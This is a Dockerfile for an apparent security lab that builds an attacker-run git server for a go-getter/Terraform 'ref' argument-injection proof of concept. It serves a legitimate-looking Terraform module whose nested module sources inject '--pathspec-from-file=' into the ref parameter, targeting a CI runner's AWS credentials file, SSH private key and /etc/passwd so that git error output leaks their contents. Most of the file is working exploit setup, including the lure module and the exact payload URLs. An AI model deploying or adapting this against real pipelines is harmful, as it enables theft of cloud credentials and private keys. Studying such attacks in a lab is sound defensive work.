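# syntax=docker/dockerfile:1
#
# Attacker-side git server for a go-getter / Terraform "ref" argument-injection
# lab. It serves two bare repositories over git's dumb HTTP transport (static
# file serving plus the info/refs index written by `git update-server-info`):
#
#   terraform-aws-vpc-internal.git  a minimal, valid module; this is the
#                                   repository the victim's go-getter checks
#                                   out with the injected ref
#   terraform-aws-vpc.git           the legitimate-looking outer module the
#                                   victim is lured into sourcing; its nested
#                                   module sources carry
#                                   "?ref=--pathspec-from-file=<victim file>"
#
# The victim-side mechanism is not in this file. Presumably the `ref` query
# value is handed unescaped to a git command (e.g. `git checkout <ref>`), which
# parses it as an option and reads pathspecs from the named local file; git's
# "pathspec ... did not match" complaints then echo that file's lines into the
# victim's command output. Confirm against the go-getter / Terraform version
# under test before relying on this.
#
# The victim must resolve the hostname "gitserver" to this container (compose
# service name or `--network-alias gitserver`); the name is baked into the
# module source URLs below.

FROM alpine:3.20

LABEL org.opencontainers.image.description="Lab-only malicious git server (go-getter ref injection PoC)"

# NOTE(review): packages are unpinned (hadolint DL3018). Pin git and python3 to
# the alpine 3.20 package revisions in use once the lab is frozen so the image
# stays reproducible.
RUN apk add --no-cache git python3

# `git commit` needs an identity; set it once globally rather than in every
# working copy.
RUN git config --global user.email "attacker@example.com" && \
    git config --global user.name "attacker"

# Each repository is built in a single layer: the throwaway working copy under
# /tmp is removed in the same RUN so it does not persist in the image (a later
# `rm` would not shrink the layer). `git clone --bare` keeps the objects, so
# deleting the source copy is safe. `update-server-info` writes info/refs and
# objects/info/packs, which the dumb HTTP transport requires because
# http.server only serves static files.

# terraform-aws-vpc-internal: minimal valid module (the one go-getter checks
# out with the malicious ref). It only needs to be a clonable repository.
RUN git init -q /tmp/vpc-internal && \
    printf 'output "result" { value = "ok" }\n' > /tmp/vpc-internal/main.tf && \
    git -C /tmp/vpc-internal add . && \
    git -C /tmp/vpc-internal commit -q -m "init" && \
    git clone -q --bare /tmp/vpc-internal /srv/git/terraform-aws-vpc-internal.git && \
    git -C /srv/git/terraform-aws-vpc-internal.git update-server-info && \
    rm -rf /tmp/vpc-internal

# terraform-aws-vpc: legitimate-looking outer module whose nested module
# sources inject "--pathspec-from-file=<file>" through the ref query parameter.
# The source URLs must stay byte-for-byte as written: the ref value is the
# whole attack. The targeted paths are what a CI runner would typically hold
# (AWS credentials file, SSH private key, /etc/passwd as a harmless canary).
RUN git init -q /tmp/vpc && \
    printf '%s\n' \
      'module "creds" {' \
      '  source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"' \
      '}' \
      'module "key" {' \
      '  source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/home/runner/.ssh/id_rsa"' \
      '}' \
      'module "passwd" {' \
      '  source = "git::http://gitserver/terraform-aws-vpc-internal.git?ref=--pathspec-from-file=/etc/passwd"' \
      '}' > /tmp/vpc/main.tf && \
    git -C /tmp/vpc add . && \
    git -C /tmp/vpc commit -q -m "init" && \
    git clone -q --bare /tmp/vpc /srv/git/terraform-aws-vpc.git && \
    git -C /srv/git/terraform-aws-vpc.git update-server-info && \
    rm -rf /tmp/vpc

# Port 80 is implied by the "http://gitserver/..." URLs above, so changing it
# would change the payload. Binding it requires root (or CAP_NET_BIND_SERVICE
# under runtimes that keep ip_unprivileged_port_start=1024); this lab image
# deliberately stays root for that reason.
EXPOSE 80
WORKDIR /srv/git

# Cheap liveness probe: the dumb-HTTP index must be reachable or clones fail.
HEALTHCHECK --interval=30s --timeout=3s --start-period=5s --retries=3 \
  CMD wget -q --spider http://127.0.0.1:80/terraform-aws-vpc.git/info/refs || exit 1

# Exec form, no shell wrapper: python is PID 1 and receives SIGTERM directly.
# http.server's request log goes to stderr and is kept on purpose: each victim
# fetch of terraform-aws-vpc-internal.git appears there, which confirms the
# module source was resolved. Whether the injected ref actually took effect is
# only visible in the victim's own output.
CMD ["python3", "-m", "http.server", "80"]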